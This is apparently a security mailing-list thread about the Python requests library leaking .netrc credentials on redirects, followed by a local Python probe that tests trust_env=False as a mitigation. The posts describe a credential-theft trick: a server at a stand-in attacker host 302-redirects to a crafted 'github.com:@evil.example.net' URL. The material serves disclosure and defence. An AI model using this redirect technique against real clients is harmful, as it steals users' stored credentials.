* Alan Coopersmith <alan.coopersm...@oracle.com>, 2025-06-03 10:09:
> I'm not sure how the attacker is supposed to get the victim to make a requests call using a URL the attacker controls

The attacker could set up a public HTTP server at <http://evil.example.net/> that redirects (via HTTP 302) everything to, say, <http://github.com:@evil.example.net>. Then they would only need to wait patiently for a visit from a robot that has requests under the hood.


* Juho Forsén, 2025-05-31 06:30:
> As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.

I'm not aware of any good way to disable netrc support in requests:
https://github.com/requests/requests/issues/2773

In particular, AFAICT something like
    requests.get("http://evil.example.net/", auth=("", ""))

(which Juho alluded to) doesn't help in the presence of redirects. The redirected URL would still be fetched with netrc auth.

--
Jakub Wilk
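Added example, not part of this thread or of the requests project: a local probe that reproduces the redirect behaviour described above (a server that 302-redirects /start to /final, with constructed credentials written to a temporary netrc file that the NETRC environment variable points at) and checks `Session.trust_env = False`, which makes requests skip the .netrc lookup both on the initial request and when it rebuilds auth after each redirect.

```python
import base64
import os
import tempfile
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
import requests

# Constructed credentials, written to a throwaway netrc file for the probe.
NETRC_USER, NETRC_PASS = "alice", "s3cret"
SEEN = []  # Authorization header of each request the local server receives


def basic(user, password):
    """Header value requests' HTTPBasicAuth sends for user/password."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


class Handler(BaseHTTPRequestHandler):
    """/start 302-redirects to /final on the same host; both record the header."""
    def do_GET(self):
        SEEN.append(self.headers.get("Authorization"))
        if self.path == "/start":
            self.send_response(302)
            self.send_header("Location", f"http://127.0.0.1:{self.server.server_port}/final")
        else:
            self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # keep the probe quiet
        pass


def probe(trust_env=True):
    """GET /start with auth=("", ""); return the Authorization values seen on each hop."""
    SEEN.clear()
    srv = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    fd, path = tempfile.mkstemp(suffix=".netrc")
    with os.fdopen(fd, "w") as f:
        f.write(f"machine 127.0.0.1 login {NETRC_USER} password {NETRC_PASS}\n")
    os.environ["NETRC"] = path  # requests reads NETRC to locate the netrc file
    try:
        s = requests.Session()
        s.trust_env = trust_env  # False: no netrc (and no proxy env) on any hop
        s.get(f"http://127.0.0.1:{srv.server_port}/start", auth=("", ""))
        return list(SEEN)  # [header on /start, header on /final]
    finally:
        srv.shutdown()
        os.environ.pop("NETRC", None)
        os.unlink(path)
```

With the default trust_env the /final hop carries the netrc credentials even though the call passed auth=("", ""); with trust_env=False both hops carry only the empty credentials. trust_env=False also stops requests from honouring proxy and CA-bundle environment variables, so it is a per-session decision rather than a drop-in global switch.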
